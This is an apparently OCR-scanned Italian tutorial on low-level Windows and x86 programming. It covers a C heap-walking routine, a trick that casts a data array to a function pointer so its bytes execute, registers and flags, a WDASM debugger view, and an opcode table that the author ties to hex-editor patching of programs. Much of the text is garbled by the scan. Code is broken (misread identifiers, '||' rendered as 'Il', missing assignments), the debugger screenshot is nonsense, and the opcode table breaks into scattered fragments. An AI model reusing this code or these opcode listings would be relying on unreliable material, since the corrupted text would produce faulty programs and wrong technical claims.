typedef struct tagDEFAULTDATASEGMENT 


HANDLE hinstActive; // instance handle of active app 
HWND hwndActive; // window handle of active app 


WORD wSize, // size (bytes) of Data Segment. 
wStaticData, // size (bytes) of static data. 
wStackMax, // size (bytes) of stack size defined in .DEF 
wStackUsed, // size (bytes) of stack actually used. 
wHeapMoveable, // size (bytes) of heap allocation (moveable). 
wHeapFixed, // size (bytes) of heap allocation (fixed). 
wHeapFree, // size (bytes) of free space in heap. 
wOther, // size (bytes) of remaining allocated space in DS. 
wUnused; // size (bytes) of heap unused. 


} DEFAULTDATASEGMENT; 


static DEFAULTDATASEGMENT DDS ; 


void CMainDlgwindow::dds_walk () 
{ 
Z% Original Code by: Chiverton Graphics, Inc. 1991 
Modified by Todd Osborne January 1994 to MFC 2.0 C++ 
application with new features. CompuServe ID: 71431,2243 
*/ 


static DEFAULTDATASEGMENT 01dDDS; 


WORD wRecordSize, // size in bytes of heap record. 

wStatus; // type of heap record. 

LPSTR lpInstance, // far pointer to Default Data Segment. 
lpHeapRecord, // far pointer to heap record. 
lpNextHeapRecord; // far pointer to next heap record. 

#define PREV_POINTER (*(WORD FAR*) lpHeapRecord) // Backward "pointer" 


#define NEXT_POINTER (*(WORD FAR*)(lpHeapRecord+2)) // Forward "pointer" 


#define PSTACKBOTTOM (*(WORD FAR*)(lpInstance+14)) 
#define PSTACKMIN (*(WORD FAR*)(lpInstance+12)) 
#define PSTACKTOP (*(WORD FAR*)(lpInstance+10)) 
#define PLOCALHEAP (*(WORD FAR*)(lpInstance+ 6)) 


// First, initialize the data segment values. 
DDS.wSize 
DDS.wStaticData 
DDS.wStackMax 

DDS .wStackUsed 
DDS.wHeapMoveable 
DDS .wHeapFixed 
DDS.wHeapFree 
DDS.wOther 

DDS . wunused 


(oMoNoiozo Zoo Zoo) 


// Now, get the window that has the focus. 
DDS.hwndActive = ::GetActiveWindow (); 


// Is it a valid window? 
if ( !Iswindow (DDS.hwndActive) ) return; 


// If this is a different window than before, get a new instance handle. 
if (DDS.hwndActive != O1dDDS.hwndActive) 


DDS.hinstActive = (HANDLE) GetWindowword (DDS.hwndActive, GWW_HINSTANCE); 
if (!DDS.hinstActive) return; 


} 


// Lock down the Data Segment 
if ( !(lpInstance = (LPSTR)GlobalLock (DDS.hinstActive))) return; 


/* 
The Data Segment is a global memory object - created by WINDOWS 
* with a GlobalAlloc. It's comprised of 4 components: header, 


Static, stack, and local heap. All 4 components are offset 
into the segment, with the header at DS:0000. 


The header occupies the first 16 bytes of a Default Data Segment. 
Within the Header area are 3 pointers to the stack: 


pStackBottom - (highest physical address) beginning of stack. 
pStackMin - High-Water mark of actual stack use. 
pStackTop - (lowest physical address) end of stack. 


Remember, the stack grows "down" (higher to lower address), so 
to compute the stack sizes, we use these equations: 


wStackMax 
wStackUsed 


pStackBottom - pStackTop ; 
pStackBottom - pStackMin ; 


E SIE SE SE SE E SE E I SE E SE E I I I I II 


DDS.wStackMax 
DDS.wStackUsed 
DDS.wStaticData 


PSTACKBOTTOM - PSTACKTOP ; 
PSTACKBOTTOM - PSTACKMIN ; 
PSTACKTOP ; 


// First test for a heap. (It's possible there isn't one.) 
if (PLOCALHEAP == 0) 


GlobalUnlock (DDS.hinstActive); 


return; 
} 
/* 
* The heap begins where the 
* stack ends. The offset that represents the 
* beginning of the heap is stored in the header area, 6 bytes from 
* DS:0000. Actually, the heap begins 4 bytes before this offset. 
* 
* Now we'll get a far pointer (lpHeapRecord) to the ist record in the heap. 
* 
*/ 


lpHeapRecord = lpInstance + PLOCALHEAP - 4; 


* Traverse the local heap. The heap is implemented as a doubly-linked 

* list. The 1st WORD is a backward "pointer" (ie, offset) to the 

* previous record. The 2nd WORD is the forward pointer to the next record. 
* when the forward pointer points to itself we are done. 

* 


DDS.wSize = (WORD)GlobalSize (DDS.hinstActive); 
while (FP_OFF(lpHeapRecord) < DDS.wSize) 
lpNextHeapRecord = (lpInstance + NEXT_POINTER); 


if (lpNextHeapRecord == lpHeapRecord) break; 
wRecordSize = lpNextHeapRecord - lpHeapRecord; //includes ptr overhead 


wStatus = (PREV_POINTER & 0x0003); 
switch (wStatus) 
{ 
case 0: DDS.wHeapFree += wRecordSize; break; 
case 1: DDS.wHeapFixed += wRecordSize; break; 
case 3: DDS.wHeapMoveable += wRecordSize; break; 
} 


lpHeapRecord = lpNextHeapRecord; 
} 


/* 
* At this point, heap traversal is done. 


* However, the heap can grow until the size of DS is 64K (0xFFFF). 
* Determine how many additional bytes the heap can grow. 

*/ 

DDS.wUnused = OxFFFF - DDS.wSize; 


// Anything else we didn't account for? 
DDS.wother = DDS.wSize - DDS.wStaticData 

- DDS.wStackMax 

- DDS.wHeapFixed 

- DDS.wHeapFree 

- DDS.wHeapMoveable ; 


GlobalUunlock (DDS.hinstActive); 


// If anything has changed since last walk, update client window. 


if (DDS.hwndActive != O01dDDS.hwndActive Il 
DDS .wHeapFree !1= O1dDDS.wHeapFree Il 
DDS.wHeapFixed !1= O1dDDS.wHeapFixed Il 
DDS.wHeapMoveable != O01dDDS.wHeapMoveable || 
DDS .wOther != O1dDDS.wOther Il 
DDS.wSize I= O1dDDS.wSize Il 
DDS .wStackUsed I= O1dDDS.wStackUsed) 

{ 


// Update Dialog Box Values 
char sz[80]; 


// Get Active Window Title 

char Title[80]; 
::GetWindowText(DDS.hwndActive, Title, 80); 
sprintf(sz, "Watching: %s", Title); 
SetDlgItemText(LBL_ WATCHING, sz); 


// Fill in Memory Information 
sprintf(sz, "%u", DDS.wSize); 
SetDlgItemText(LBL_DATAO, sz); 


sprintf(sz, "%u", DDS.wStaticData); 
SetDlgItemText(LBL_DATA1, Sz); 


sprintf(sz, "%u", DDS.wStackMax); 
SetDlgItemText(LBL_DATA2, sz); 


sprintf(sz, "%u", DDS.wStackUsed); 
SetDlgItemText(LBL_DATA3, Sz); 


sprintf(sz, "%u", DDS.wHeapMoveable); 
SetDlgItemText(LBL_DATA4, sz); 


sprintf(sz, "%u", DDS.wHeapFixed); 
SetDlgItemText(LBL_DATA5, Sz); 


sprintf(sz, "%u", DDS.wHeapFree); 
SetDlgItemText(LBL_DATA6, Sz); 


sprintf(sz, "%u", DDS.wOther); 
SetDlgItemText(LBL_DATA7, sz); 


sprintf(sz, "%u", DDS.wUnused); 
SetDlgItemText(LBL_DATA8, sz); 


sprintf(sz, "%.3f", m_nTiming); 
SetDlgItemText(LBL_DATA9, sz); 


O1dDDS = DDS; 


} 


Il C comunque permette di vedere come di fatto è un super assembler. 
Guardate il seguente esempio e capirete il perchè. 


Dicevo prima che il codice viene allocato normalmente in un segmento di codice 
mentre le dichiarazioni globali in un segmento dati. 

Se prendiamo il debugger ed andiamo a vedere come sono salvate le nostre 
istruzioni vediamo che sono delle lunghe sequenze di numeri che noi possiamo 
visualizzare in binario, esadecimale o qualsiasi base numerica che vogliamo. 
Quindi un codice del tipo 


MOV ecx, eax 
and ecx, 000003 
ecc. 


potremmo vederlo in esadecimale come 


8Cc8 mov ecx, aax 
83E13 and ecx, 000003 


Il Linguaggio C possiede il concetto di CAST ovvero di forzatura il quale 
permette di far vedere al linguaggio delle tipologie diverse come se di fatto 
fossero altri tipi e quindi con propriet aritmetiche differenti dall'originale. 
Prendiamo i numeri relativi al codice assembler di una funzione e inseriamoli 
come elementi di un array di unsigned char (1 byte). 


unsigned char codex[] = { ©0x8C, 0xC8, 0x83, OxE1, 0x13 }; 


A questo punto dichiariamo un puntatore ad una funzione. 
Un puntatore ad una funzione è lo spazio sufficiente a mantenere memorizzato 
l’indirizzo di una funzione. 


void (*function)(); 


Se a questo punto invece di assegnargli l’indirizzo di una funzione eseguiamo il 
CAST imbrogliandolo e facendogli credere che l'indirizzo dell’array di unsigned 
char sia di fatto l'indirizzo di una funzione avremo che richiamando il 
puntatore a funzione il sistema eseguirà i numeri contenuti nell’array come se 
di fatto fossero codice binario. 


(*function)() = (void(*)()) &codex[0]; 


Bello non è vero ! 
Il programmino in C sarebbe 


int a[] = { 12,23, 34,56,78 }; 
void (*func)() = (void (*)()) &a[0]; 
void main(void) 


(*func)(); 


Tanto per non perdere l’occhio guardate il tutto tradotto in assembler dal 
compilatore. 


TITLE test2.c 
.386P 
include listing.inc 
if @Version gt 510 
.model FLAT 
else 
_TEXT SEGMENT PARA USE32 PUBLIC 'CODE' 
_TEXT ENDS 
_DATA SEGMENT DWORD USE32 PUBLIC 'DATA' 


_DATA ENDS 

CONST SEGMENT DWORD USE32 PUBLIC 'CONST' 
CONST ENDS 
_BSS SEGMENT DWORD USE32 PUBLIC 'BSS' 
_BSS ENDS 
_TLS SEGMENT DWORD USE32 PUBLIC 'TLS' 
_TLS ENDS 

FLAT GROUP _DATA, CONST, _BSS 

ASSUME CS: FLAT, DS: FLAT, SS: FLAT 

endif 

PUBLIC _a 

PUBLIC _func 
_DATA SEGMENT 

a DD OcH 


DD 017H 

DD 022H 

DD 038H 

DD 04eH 
_func DD FLAT:_a 
_DATA ENDS 
PUBLIC _main 


_TEXT SEGMENT 
_main PROC NEAR 
; File test2.c 


; Line 10 

push ebp 

mov ebp, esp 
; Line 11 

call DWORD PTR_func 
; Line 12 

pop ebp 

ret (0) 
_main ENDP 
_ TEXT ENDS 
END 


Come potete vedere la call salta esattamente dove ci sono gli interi. 


ATTENZIONE A NON ESEGUIRE IL CODICE DATO CHE GLI INTERI NON CORRIPSONDONO A 
NIENTE DI ESEGUIBILE. MANDERESTE IN CRASH IL SISTEMA. 


Facciamo saltare il sistema ad eseguire del codice dentro al data segment. 
Vediamo ora lo scopo dei registri. 


EAX e EDX sono registri a scopo generale che possono essere utilizzati per 
diversi motivi. 


ECX è anche lui a scopo generale. Diventa specializzato quando viene utilizzato 
in fasi di conteggio. 


EBX è sempre general purpose anche se spesso viene utilizzato per creare 
indirizzi di dispiazzamento. 


Come dicevo prima i registri da EAX a EDX possono essere visti come registri a 
32, 16 oppure a 8 bits. 
Ad esempio 


32 16 8 8 


EAX  AX AH AL [EAX[AX[AH][AL]]] 


EBX  BX BH BL [EBX[BX[BH][BL]]] 
ECX CX CH CL [ECX[CX[CH][CL]]] 
EDX DX DH DL [EDX[DX[DH][DL]]] 


ESI ed EDI sono usati spesso come registri d’indice oppure vengono spesso usati 
per puntare a stringhe. 


ESP ed EBP sono usati per gestire lo stack. 

Una volta lo stack era fisso nei processori (preistoria). 

Successivamente vennero inseriti dei registri per puntare alla base ed alla 
testa dello stack. 

Esistono inoltre quattro registri di segmento e precisamente quelli del CODE 
SEGMENT, DATA SEGMENT, STACK SEGMENT ed EXTRA SEGMENTI. 

Questi sono CS, DS, ES, 
GS, FS ed SS. 

Un registro particolare è 


Eip:BFF996DF is in Module: KERNEL32.DLL 


: uello che mantiene 
Reus__Convl| O DITSTAPC 8Processes=: [001 q l'indiri 
cipebtto96dt | No fo Fa fo fo fo fo fo lo | pracenaz: (cor, indirizzo 
sax=0022005c i dell'istruzione in 
ebi=00000000 I° Source For Data Disp l Copy] -_ _-—..] 3 É t 
cià TOTI —— aj "Serene de8 esecuzione e precisamente 
EDX=00092000 l'esp-DONdon1G] - aresssa: ; cs=0177 EIP. 
051=000000D0 fesp-0000000C] - c?7104130 0... nda Nel processore esiste 
edi-916Zban0 lesp-000000081 - iresirei l 33=017É : ; 
ebp=3152c08 (ff 1--- pODADO( = ‘abondnno. “<£ 33=017£ anche un registro dei 
s=132 . " i 
2000 0000 CFECErINE PIE sl (1°) flags che indicano certi 
[User Adar i] E924 e-=p+0000000 bEETCBat ... La ; 
00400000 - [2p+0000500] cià BIts Copy] clear] i dda SEO nia 
[esptD0n00nocI — fEEssees nre Gli indirizzi delle 
o r— auattoorntpi Norte del stringhe usate nei 
[oos09214 a] for 054] Hode--[[Wori Yard] 2 ni conii pal programmi vengono spesso 
r— Source For Data Disp 2 Copy] | Active Dite cane) inseriti nel registri per 
piso l Address: S15PAD38 is Mor in a Loaded Module ADVARIOZ.I cul risulta spesso 
za) char(000|:"" GDI32. DIL importante avere una 
mar [| DIO ED:33S9300c, WOBD:800C, BYTE:De KERNEL22.DLL M panoramica dei valori a 
Opst | CODE: or al, 80 I prac Creare Brk E î È È 
resi cui puntano 1 registri. 
| LosylCrars creare Brk Spesso gli indirizzi 
Rv0002 Loading DIl DLEAUTIZ.DIL A «der: 65340000 23 coseli_ vera ia er delle stringhe o dei 
_fodify Data{ Goto Current Hip] DLL Unlcad Brk valori sono inseriti ad 


indirizzi calcolati con 


[EDX + 10] 
oppure 
[ECX - 2] 


Per questo motivo alcuni disassemblatori possiedono finestre in cui mostrano in 
continuazione questi valori mentre altri permettono di richiederne la 
visualizzazione con appositi comandi. 

La seguente finestra è di WDASM 8.9 e devo ammettere che è veramente ottima come 
quantità di dati mostrati. 

Inoltre permette di cambiare il formato dei dati (DWORD, WORD, BYTE ecc.) 

I vari valori relativi a [EAX - 10] ecc. sono mostrati nella finestra centrale. 
E’ possibile cambiare il registro premendo il pulsante sul lato sinistro della 
lista di scorrimento. 

I pulsanti sul lato in basso permettono invece di fare quanto appena detto, 
ovvero di cambiare il formato di visualizzazione. 

La visione dei registri deve essere anche contemplata nell’istante in cui si 
analizzano le istruzione dell’assembler 80xx. 

Un registro particolare è quello dei flags il quale serve a segnalare eventi 
particolari. 


Lo scopo di ogni singolo flag è riportato in una tabella nella pagina 
successiva. 

Il linguaggio C dispone della specifica _ASM (ogni compilatore possiede la sua) 
che permette di scrivere del codice in assembler. 

Queste istruzioni possono essere riassunte utilizzando una matrice in cui sono 
raggruppate in due gruppi e precisamente istruzioni con un solo operando o con 
due. 

Le istruzioni sono registro a registro, registro a memoria, memoria a registro 
oppure possono influire su registri d’indice. 

Parlando di registri ricordiamoci che i processori della classe 386 possiedono 
una serie di quattro registri di breakpoint che permette ai debugger di gestire 
tali funzionalità. 

Dicevamo prima di una matrice che può mostrare i tipi di istruzioni: 


DUE OPERANDI UN OPERANDO 
R<- M R 

M <- R M 

R<- R Sc 

R|M <- I 

R|M <- S * 

S <- R[M * 


* Solamente istruzioni movimento dati (MOV, PUSH, POP) 
S Registri di segmento (CS, DS, ES, SS) 

R Registri ordinari EAX, EBX, ecc.) 

M Uno degli indirizzi seguenti 

e Indirizzo puro 

e [BX]+toffset 

e [BP]+offset 

e qualsiasi di questi indicizzati da SI 

e qualsiasi dei primi tre indicizzati da DI 


Prima di proseguire con le istruzioni assemblative diamo un occhiata a quella 
che permette di dichiarare delle variabili. 


FLAGS - Intel 8086 Family Flags Register 


|11]|10|F|E|D|C|B|A|9|8|7|6]|5|4|3|2|1|0] 
| | | '--- CF Carry Flag 
1 


'--- 0 
---. AF Auxiliary Flag 
--- 0 
---. ZF Zero Flag 
---. SF Sign Flag 
--- TF Trap Flag (Single Step) 
---. IF Interrupt Flag 
---. DF Direction Flag 
--- OF Overflow flag 
|'----- IOPL 1/0 Privilege Level (286+ only) 
|'----- NT Nested Task Flag (286+ only) 
|'----- 0 
'_.---- RF Resume Flag (386+ only) 
------ VM Virtual Mode Flag (386+ only) 
- see @PUSHF POPF STI CLI STD CLD 


Il 
||| '--- PF Parity Flag 
I] 
| 


Una specie di registro particolare è il seguente, presente solo nelle macchine 
successive al 286. 


MSW - Machine Status Word (286+ only) 
|31|30-5|4|3|2|1|0| Machine Status Word 
| I I| | | '---- Protection Enable (PE) 
| Id] '----- Math Present (MP) 
| | 11------ Emulation (EM) 
| | |'------- Task Switched (TS) 
| |U-------- Extension Type (ET) 
| ' 


---------- Reserved 
-----..-.---- Paging (PG) 
Bit 0 PE Protection Enable, switches processor between 
protected and real mode 
Bit 1 MP Math Present, controls function of the WAIT 
instruction 
Bit 2 EM Emulation, indicates whether coprocessor functions 
are to be emulated 
Bit 3 TS Task Switched, set and interrogated by coprocessor 
on task switches and when interpretting coprocessor 
instructions 
Bit 4 ET Extension Type, indicates type of coprocessor in 
system 
Bits 5-30 Reserved 
bit 31 PG Paging, indicates whether the processor uses page 
tables to translate linear addresses to physical 
addresses 


- See SMSW LMSW 


Abbiamo accennato prima qualche cosa a riguardo delle allocazioni delle 
variabili nei vari segmenti. 

In linguaggi come il Basic la tipologia delle variabili riguarda in particolare 
modo il genere dei contenuti. 

In altre parole le informazioni di tipo quantitativo possono essere inserite in 
variabili di tipo numerico mentre le informazioni di tipo qualitativo in 
variabili stringa. 

In linguaggio C invece la tipologia delle variabili riguardano in particolare 
modo le dimensioni relative all'occupazione del dato stesso espresso in numero 
di bytes. 

Ad esempio un carattere che occupa un solo byte può essere contenuto 
tranquillamente in un char anche se nessuno ci vieta di inserirlo in un int o 
short. 

Oltre a questo nessuno ci vieta di usare la variabile per calcoli matematici. 

Ad esempio fare 


char c = ‘A’; 
c=c* 2; 


è corretto. 

Al limite dobbiamo stare attenti a non mandare in overflow la variabile con il 
risultato dell'operazione. 

Il problema si pone spesso quando si usano variabili per fare calcoli. 

Se ad esempio usassimo una serie di variabili per fare calcoli dobbiamo 
preoccuparci che le variabili siano sufficientemente grosse a mantenere i vari 
valori che durante i calcoli si creano. 

In pratica se avessimo 


int n = 30000; 
int x = 20; 
int r = 5000; 


long y; 


saremmo, fino a questo punto, a posto. 
Andremmo male facendo 


y=r+(n*r); 


in quanto (n * r) darebbe un valore maggiore alle tipologie int usate nei tipi 
dell’operazione per cui i valori sarebbero troncati. 

Questa è causa sovente di errori inspiegabili. 

In assembler le variabili sono di tipo BYTE, WORD, DOUBLEWORD e sono quasi 
sempre dichiarate nel data segment mediante la sintassi seguente: 


NOME_VAR TIPO ? 
Ad esempio 


DATA_PTR DW ? 
ESC_CHAR DB ? 


Le tipologie sono 


(nome var opzionale) DB (lista valori) 
(nome var opzionale) DW (lista valori) 
(nome var opzionale) DD (lista valori) 
(nome var opzionale) DQ (lista valori) 
(nome var opzionale) DT (lista valori) 


OVVero 

BYTE -> DB 
WORD -> DW 
DWORD -> DD 
QWORD -> DQ 
TWORD -> DT 


Nelle dichiarazioni possono essere utilizzati termini particolari come ad 
esempio DUP. 
Le seguenti sono allocazioni valide. 


DW 5 ; alloca una word, inizializzandola con 5 
DB 0,3,0 ; alloca tre bytes, inizializzandoli con 0, 3, 0 
DB 5 DUP (0) ; equivalente a DB 0,0,0,0,0 


DW 2 DUP (0,4 DUP (7)) ; equivalente a DW 0,7,7,7,7,0,7,7,7,7 
Per le stringhe è possibile 

DB ‘Ciao’ 

Vediamo in dettaglio il set istruzioni assembler. 


Istruzioni ordinarie a due operandi 


1) ADD e ADC - Addizione con o senza includere un riporto dalla precedente 
addizione. 

2) SUB o SBB - Sottrazione con o senza riporto da una precedente sottrazione. 

3) CMP - Comparazione 


4) AND, OR o XOR - Tipiche operazioni booleane 

5) TEST - Tipo AND 

6) MOV - Muove i dati dalla sorgente alla destinazione 
7) LDS, LES, LEA - Forme di MOV specializzate 


Molte forme di caricamento delle stringhe relative a messaggi da visualizzare 
vengono eseguite tramite queste ul6time istruzioni. 
Sono comuni costrutti del tipo 


lea edx, dword ptr [ebp + FFFFAA8] 


Istruzioni ordinarie ad un solo operando sono 


1) INC - incrementa il contenuto 
2) DEC - Decrementa 


3) NEG - Due complementi 


4) NOT - Un complemento 
5) PUSH - Inserisce un valore nello stack 
6) POP - Preleva un valore dallo stack 


Alcune istruzioni 


richiedono l’uso 


1) Istruzioni 
2) Istruzioni 
ASCII 
3) Operazioni 


4) IN, OUT le 


non seguono le 


di erti registri. 


di moltiplicazione e divisione. 
di aggiustamento che aiutano a eseguire operazioni su dati 


di shift e di rotazione 
quali agiscono sulle 1024 possibili porte hardware 
5) CBW , CWD - Convertono byte in word oppure word in doubleword. 


Istruzioni che agiscono sul flusso del programma. 


1) CALL, RET 


Chiamata e ritorno. 


regole generali delle altre ma comunque 


Ricordatevi del discorso fatto per il 
basic legato alle istruzioni di salto condizionate (GOSUB e RETURN). 


2) INT, IRET - Chiamata d’ interrupts e ritorno da una routine d’interript. 


3) JMP - Salto 


4) LOOP, LOOPNZ, 


LOOPZ - Istruzioni che implementano dei loops. 
5) Varie istruzioni di salto condizionate (JE, JNE ecc.) 
Le vedremo n modo dettagliato tra poco. 


Istruzioni su stringhe o sequenze di caratteri. 


Considerate in queste istruzioni che 


combinazioni di DS e SI, 


1) CMPSB/CMPSW 
2) LODSB/LODSW 
3) STOSB/STOSW 
4) MOVSB/MOVSW 
5) SCASB/SCASW 


Compara byte o word 
Legge bytes o words in AL o AX 
Salva bytes o words da AL o AX. 
Muove bytes o words 
Compara bytes o words con i contenuti di AL o AX. 


6) REP/REPE/REPNE - Un 


Ad esempio 


REP MOVSB 
REP STOSB 
REPNE SCASB 


prefisso con 


Altre istruzioni riguardano lo stack. 
Le funzionalit sono due 


spesso i sorgenti sono descritte da 
mentre le destinazioni da ES e DI. 


il quale può essere combinato con 
qualsiasi delle precedenti istruzioni perche vengano ripetute 
stringa la cui lunghezza è in CX. 


1) PUSH - Inserisce un valore nello stack 
2) POP - Lo preleva 


su 


una 


Quando seguite un programma tenetelo sempre a bada in particolar modo prima e 
dopo qualche chiamata. 
A proposito di chiamate, queste avvengono tramite l'istruzione 


1) CALL - Esegue una chiamata 


Se usate WDASM potete richiedere la visualizzazione di ESP nel seguente modo. 
Prendiamo un piccolo esempio per capire di cosa stiamo parlando. 

Supponiamo di avere il seguente codice e di essere posizionati sulla linea 
precedente aqlla call. 


:0040C191 A3309D4100 mov dword ptr [00419D30], eax 
:0040C196 E895230000 call 0040E530 
:0040C19B A300744100 mov dword ptr [00417400], eax 
:0040C1A0 85C0 test eax, eax 


Se in WDASM analizziamo la finestra con i registri possiamo richiedere di 
visualizzare nella finestrella centrale il registro ESP. 
Il seguente è la copia prima della call. 


[esp-00000014] - 0000017f .... —ssc Wai 
[esp-00000010] - 00000000 .... fi i 
[esp-0000000C] - 00000216 [esp-00000010] - BLSdliTe 


| 
lesp-0000000C] - D06S5£e239 9. 
[esp-00000003] - 0055000 

[esp- 00000004] 0040cL9b 


[esp-00000008] - 00000316 .... 
[esp-00000004] - 0040c191 ..@. 
[esp+00000000] - 00000000  . 
[esp+00000004] - 815d117c |. 
[esp+00000008] - 00550000 . o 

[esp+0000000C] - 00000000 .... - Fizstierei piste Bi 
[esp+00000010] - 00000008 .... fon oss) nose->[pvori era | ayte | coda | 
[esp+00000014] - 00000000 .... 


[ezpt+00000004] 
[esp+t0000 0008] 
[ezp+ 00000000] COOO C000 


00550000 v 


cui 


Ricordatevi che il pulsanti in basso permettono di vedere come dword, word, byte 
o codice i dati di questa finestra. 

A questo punto richiediamo di eseguire la call e successivamente analizziamo i 
dati mostrati. 


[esp-00000014] - 0000017f 
[esp-00000010] - 815d117c |.] 
[esp-0000000C] - 0065fe38 8.e. 
[esp-00000008] - 00550000 ..U. 
[esp-00000004] - 0040c19b ..@ 
[esp+00000000] - 00000000 .... 
[esp+00000004] - 815d117c |.]. 
[esp+00000008] - 00550000 ..U. 
[esp+0000000C] - 00000000 
[esp+00000010] - 00000008 
[esp+00000014] - 00000000 


Se vi dovesse servire apritevi il NOTEPAD e di tanto in tanto usate i pulsanti 

COPY posizionati su ogni finestrella. 

Successivamente potete usare il comando PASTE per metterveli nel notepad. 

A forza di seguire programmi assembler tenersi segnato da qualche parte i dati 

può essere utile. 

Esistono anche dei flags che indicano alcuni avvenimenti particolari quali 

interrupts, riporti ecc. 

La seguente tabella mostra le istruzioni riservate dell’assembler compresi gli 

opcode. 

Questi sono importanti in quanto è necessari conoscerli per poterli sostituire 

con un editor hex nelle patch ai nostri programmi. 

Gli indirizzi effettivi li potete calcolare riferendovi alla tabella riportata 

precedentemente in questo capitolo. 

“v” denota un tipo uguale a w ovvero una word (16 bits). 

bic indica che l’operando è una code-label, la quale punta ad una parte del 
programma che deve essere “salato” o “chiamato”. 


"e" indica che l’operando è un indirizzo effettivo. 


ape Ei indica una costante immediata. 
"m" indica una variabile in memoria. 
Suo indica un registro ad uso generale. 


"rv/m" è usato in istruzioni bit test 


Opcodes Instruction Description 


67 or nil A2 (prefix) 3 Use 16-bit address (indexing) in next instruction 
67 or nil A4 (prefix) 3 Use 32-bit address (indexing) in next instruction 


37 AAA ASCII adjust AL (carry into AH) after addition 
D5 0A AAD ASCII adjust before division (AX = 10*AH + AL) 

D4 0A AAM ASCII adjust after multiply (AL/10: AH=Quo AL=Rem) 
3F AAS ASCII adjust AL (borrow from AH) after subtraction 
14 ib ADC AL, ib Add with carry immediate byte into AL 

15 iv ADC eAX,iv Add with carry immediate vword into eAX 

80 /2 ib ADC eb,ib Add with carry immediate byte into EA byte 

10 /r ADC eb,rb Add with carry byte register into EA byte 

83 /2 ib ADC ev, ib Add with carry immediate byte into EA vword 

81 /2 iv ADC ev,iv Add with carry immediate vword into EA vword 

11 /r ADC ev,rv Add with carry vword register into EA vword 

12 /r ADC rb,eb Add with carry EA byte into byte register 

13 /r ADC rv, ev Add with carry EA vword into vword register 

04 ib ADD AL,ib Add immediate byte into AL 

05 iv ADD eAX,iv Add immediate vword into eAX 

80 /0 ib ADD eb, ib Add immediate byte into EA byte 

00 /r ADD eb,rb Add byte register into EA byte 

83 /0 ib ADD ev, ib Add immediate byte into EA vword 

81 /0 iv ADD ev,iv Add immediate vword into EA vword 

01 /r ADD ev,rv Add vword register into EA vword 

02 /r ADD rb,eb Add EA byte into byte register 

03 /r ADD rv, ev Add EA vword into vword register 

OF 20 ADD4S N Add CL nibbles BCD, DS:SI into ES:DI (CL even,NZ) 
24 ib AND AL,ib Logical-AND immediate byte into AL 

25 iv AND eAX,iv Logical-AND immediate vword into eAX 

80 /4 ib AND eb, ib Logical-AND immediate byte into EA byte 

20 /r AND eb,rb Logical-AND byte register into EA byte 

83 /4 ib AND ev, ib Logical-AND immediate byte into EA vword 

81 /4 iv. AND ev,iv Logical-AND immediate vword into EA vword 

21 /r AND ev,rv Logical-AND vword register into EA vword 

22 /r AND rb, eb Logical-AND EA byte into byte register 

23 /r AND rv, ev Logical-AND EA vword into vword register 

63 /r ARPL ew,rw 2 Adjust RPL of EA word not smaller than RPL of rw 
62 /r BOUND rv,m2v 2 INT 5 if rw not between 2 vwords at [m] inclusive 
OF BC BSF rv,ev 3 Set rv to lowest position of NZ bit in ev 

OF BD BSR rv,ev 3 Set rv to highest position of NZ bit in ev 

OF C8+r BSWAP rd 4 Swap bytes 1,4 and 2,3 of dword register 


OF BA/4 ib BT rv/m,ib 3 Set Carry flag to bit # ib of array at rv/m 

OF A3/r BT rv/m,rv 3 Set Carry flag to bit # rv of array at rv/m 

OF BA/7 ib BTC rv/m,ib 3 Set CF to, then compl bit ib of array at rv/m 

OF BB/r BTC rv/m,rv 3 Set CF to, then compl bit rv of array at rv/m 

OF BA/6 ib BTR rv/m, 3 Set CF to, then reset bit ib of array at rv/m 

OF B3/r BTR rv/m,rv 3 Set CF to, then reset bit rv of array at rv/m 

OF BA/5 ib BTS rv/m,ib 3 Set CF to, then set bit ib of array at rv/m 

OF AB/r BTS rv/m,rv 3 Set CF to, then set bit rv of array at rv/m 

9A cp CALL cp Call far segment, immediate 4- or 6-byte address 
E8 cv CALL cv Call near, offset relative to next instruction 
FF /3 CALL ep Call far segment, address at EA memory location 
FF /2 CALL ev Call near, offset absolute at EA vword 

OF FF ib CALL80 ib N Call 8080-emulation code at INT number ib 

98 CBW Convert byte into word (AH = top bit of AL) 

99 cDQ 3 Convert dword to qword (EDX = top bit of EAX) 

F8 CLC Clear carry flag 

FC CLD Clear direction flag so SI and DI will increment 
FA CLI Clear interrupt enable flag; interrupts disabled 


OF 12/0 CLRBIT eb,CL N Clear bit CL of eb 
OF 13/0 CLRBIT ew,CL N Clear bit CL of ew 
OF 1A/0 ib CLRBIT eb, ib N Clear bit ib of eb 
OF 1B/0 ib CLRBIT ew, ib N Clear bit ib of ew 
OF 06 CLTS 2 Clear task switched flag 


C7 
BO 
B1 
A2 


ch 


ib 


ib 
iv 


/1 
/r 
/r 


00 
01 
ib 


/r 
ib 
iv 
iv 
ib 


/T7 


CMC 


CMP 
CMP 
CMP 
CMP 
CMP 
CMP 
CMP 
CMP 
CMP 


CMP4. 
CMPS 
CMPS 
CMPS 
CMPS 


AL, ib 
eAX, iv 
eb, ib 
eb,rb 
ev,ib 
ev, iv 
ev, rv 
rb,eb 
rv, ev 


S 
mb, mb 
mv, mv 
B 
D 


CMPSW 


CMPX 
CMPX 
CMPX 
CPUI 
CwD 
CWDE 
cs ( 


DAA 
DAS 
DEC 
DEC 
DEC 


DIV 
DIV 
DS ( 


ENTE 
ENTE 
ENTE 
ES ( 
F(an 
HLT 


IDIV 
IDIV 
IMUL 
IMUL 
IMUL 
IMUL 
IMUL 
IMUL 
IMUL 


IN A 
IN A 


8 mq 

CHG eb,rb 
CHG ev,rv 
D 


prefix) 


eb 
ev 
rv 


eb 
ev 
prefix) 


R iw,0 
R iw,1 
R iw,ib 
prefix) 
y) 


eb 

ev 

eb 

ev 

rv, ev 
rv,ib 
rv, iv 
rv, ev, iv 
rv,ev,ib 


L,ib 
L, DX 


IN eAX, ib 
IN eAX, DX 


INC 
INC 
INC 


INS 
INS 
INSB 
INSD 
INSW 


INT 

INT 

INTO 
INVD 
INVL 
IRET 
IRET 


JA c 


3 


ib 


PG m 


D 


b 


CASLIAO 


1 


PWPEPH 


Complement carry flag 


Subtract immediate byte from AL for flags only 
Subtract immediate vword from eAX for flags only 
Subtract immediate byte from EA byte for flags only 
Subtract byte register from EA byte for flags only 
Subtract immediate byte from EA vword for flags only 
Subtract immediate vword from EA vword, flags only 
Subtract vword register from EA vword for flags only 
Subtract EA byte from byte register for flags only 
Subtract EA vword from vword register for flags only 


Compare CL nibbles BCD, DS:SI - ES:DI (CL even,NZ) 
Compare bytes [SI] - ES:[DI], advance SI,DI 
Compare vwords [SI] - ES:[DI], advance SI,DI 
